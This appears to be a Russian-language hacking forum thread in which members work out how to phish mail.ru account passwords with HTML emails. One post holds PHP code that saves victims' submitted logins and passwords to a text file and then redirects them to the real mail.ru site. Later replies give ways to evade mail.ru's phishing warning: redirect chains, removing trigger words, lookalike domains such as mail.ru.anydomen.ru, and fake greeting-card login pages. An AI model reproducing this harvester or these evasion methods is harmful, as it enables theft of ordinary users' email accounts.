Вопрос такой, если я отправила письмо в хтмл формате, а у меня в отправленных просто этот код, получателю придет то , что должно придти?
Ребята, помогите пожалуйста. Желание научиться есть. Но и пара вопросов появилась. Я сделал все так, как в первом посте, но при отсылке письма на другой ящик, письмо блокируется сообщением следующего содержания: Внимание! Администрация mail.ru никогда не запросит у Вас ваши логин и пароль. Как я понял вся беда в сниффере: PHP: <?php $f=fopen("mail.txt","at"); # файл куда сохранять flock($f,2); fputs($f,$_GET['Login']."@"); #логин fputs($f,$_GET['Domain']); #домен fputs($f,";".$_GET['Password']."\n"); # пароль flock($f,3); fclose($f); ?> <script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script> А именно в теге <script>. Как можно обойти подобное? Посоветуйте, пожалуйста. Разумеется в файле моем комментариев нет.
все дело в редиректе, у тебя указывет что ссылка ведет на внешний сайт(в твоем случае фейк), а надо так ссылка на майл- редирект на фейк (каждый использует лично свои редиректы и выкладывать их здесь наврядли будут- т к майл быстро все это дело фиксет)
И это всё? сдался? Может кто-нибудь попробует подумать? Убери слово пароль наxyй из письма и посмотри результат. Предупреждение пропало? Отлично! думаем дальше, как бы нам всё же оставить это слово и чтоб малрушный скрипт не сдавал нас с потрохами. И не надо больше преждевременных неправильных выводов.
Помнится была ещё тема с открытками. Там когда хотим посмотреть открытку переадресует на страницу с логином/паролем. Соответственно подменяем эту страницу на свою. Кстати проверка на урл сайта куда идёт переход с формы в письме проверяется яваскриптом под телом письма и должен содержать "mail.ru". я так понимаю, если забить домен mail.ru.anydomen.ru, то прокатит и этот фейк. Кстати следует задуматься над тем, что не обязательно вообще регить какой бы то не было хостинг, нужно реализовать отправку сообщения внутри mail.ru. Это явно поможет обойти защиту. Только вот как это сделать я пока слабо представляю, хотя мысли есть.
хорошая статья, а прочитал только сегодня. Когда научусь делать что то лучше других - напишу статью тоже!